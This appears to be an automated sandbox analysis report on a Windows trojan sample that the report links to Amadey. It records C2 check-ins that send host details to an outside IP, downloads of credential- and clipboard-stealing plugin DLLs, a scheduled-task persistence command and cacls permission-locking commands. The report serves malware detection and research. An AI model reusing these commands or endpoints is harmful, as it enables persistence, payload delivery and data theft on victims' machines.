                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: Joe Sandbox View | IP Address: 193.3.19.154
                  Source: Joe Sandbox View | ASN Name: ARNES-NETAcademicandResearchNetworkofSloveniaSI
                  Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49708 -> 193.3.19.154:80
                  Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49735 -> 193.3.19.154:80
                  Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49704 -> 193.3.19.154:80
                  Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49754 -> 193.3.19.154:80
                  Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49776 -> 193.3.19.154:80
                  Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49714 -> 193.3.19.154:80
                  Source: unknown | TCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: global traffic | HTTP traffic detected: GET /store/games/Plugins/cred64.dll HTTP/1.1 | Host: 193.3.19.154
                  Source: global traffic | HTTP traffic detected: GET /store/games/Plugins/clip64.dll HTTP/1.1 | Host: 193.3.19.154
                  Source: unknown | HTTP traffic detected: POST /store/games/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 193.3.19.154 | Content-Length: 88 | Cache-Control: no-cache | Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 | Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.3.19.154/store/games/Plugins/clip64.dll
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.3.19.154/store/games/Plugins/clip64.dllYS2
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.3.19.154/store/games/Plugins/cred64.dll
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.3.19.154/store/games/Plugins/cred64.dllx
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.3.19.154/store/games/index.php
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.3.19.154/store/games/index.php1mb3JtLXVybGVuY29kZWQ=
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.3.19.154/store/games/index.php1mb3JtLXVybGVuY29kZWQ=N
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.3.19.154/store/games/index.phpc
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.3.19.154/store/games/index.phpd
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.3.19.154/store/games/index.phpded
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.3.19.154/store/games/index.phpe5a2ab05
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.3.19.154/store/games/index.phppd
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.3.19.154/store/games/index.phppdR
                  Source: oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://193.3.19.154/store/games/index.phpt
                  Source: Week13.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: classification engine | Classification label: mal100.troj.spyw.winEXE@26/6@0/1
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | File created: C:\Users\user\AppData\Roaming\006700e5a2ab05
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1252:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6620:120:WilError_03
                  Source: C:\Users\user\Desktop\Week13.exe | File created: C:\Users\user\AppData\Local\Temp\cb7ae701b3
                  Source: Week13.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Week13.exe | File read: C:\Users\desktop.ini
                  Source: C:\Users\user\Desktop\Week13.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: Week13.exe | ReversingLabs: Detection: 91%
                  Source: C:\Users\user\Desktop\Week13.exe | File read: C:\Users\user\Desktop\Week13.exe
                  Source: unknown | Process created: C:\Users\user\Desktop\Week13.exe "C:\Users\user\Desktop\Week13.exe"
                  Source: C:\Users\user\Desktop\Week13.exe | Process created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F
                  Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "user:N"&&CACLS "oneetx.exe" /P "user:R" /E&&echo Y|CACLS "..\cb7ae701b3" /P "user:N"&&CACLS "..\cb7ae701b3" /P "user:R" /E&&Exit
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:N"
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:R" /E
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb7ae701b3" /P "user:N"
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb7ae701b3" /P "user:R" /E
                  Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: dui70.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: duser.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: chartv.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: oleacc.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: atlthunk.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: textinputframework.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: coreuicomponents.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: coremessaging.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: ntmarta.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: wtsapi32.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: winsta.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: textshaping.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: propsys.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: windows.fileexplorer.common.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: edputil.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: appresolver.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: bcp47langs.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: slc.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: sppc.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: explorerframe.dll
                  Source: C:\Users\user\Desktop\Week13.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Section loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Section loaded: edputil.dll
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Section loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Section loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Section loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Week13.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{515980c3-57fe-4c1e-a561-730dd256ab98}\InprocServer32Jump to behavior
                  Source: Week13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: Week13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: Week13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: Week13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Week13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: Week13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: Week13.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Week13.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: Week13.exe, oneetx.exe.0.dr
                  Source: Week13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: Week13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: Week13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: Week13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: Week13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Persistence and Installation Behavior

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000001.00000002.4482643286.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4482643286.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: oneetx.exe PID: 6160, type: MEMORYSTR
Source: C:\Users\user\Desktop\Week13.exe | File created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe (dropped file)

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders | Startup
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders | Startup
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:N"
Source: C:\Users\user\Desktop\Week13.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Window / User API: threadDelayed 6023
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Window / User API: threadDelayed 3869
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe TID: 6508 | Thread sleep count: 6023 > 30
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe TID: 6508 | Thread sleep time: -180690000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe TID: 2952 | Thread sleep time: -50000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe TID: 1252 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe TID: 6508 | Thread sleep count: 3869 > 30
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe TID: 6508 | Thread sleep time: -116070000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\Week13.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Thread delayed: delay time: 50000
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Thread delayed: delay time: 30000
Source: oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@B
Source: Week13.exe, 00000000.00000003.2020280700.00000000011F1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, oneetx.exe, 00000001.00000002.4482643286.0000000000D36000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Week13.exe | Process created: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "user:N"&&CACLS "oneetx.exe" /P "user:R" /E&&echo Y|CACLS "..\cb7ae701b3" /P "user:N"&&CACLS "..\cb7ae701b3" /P "user:R" /E&&Exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb7ae701b3" /P "user:N"
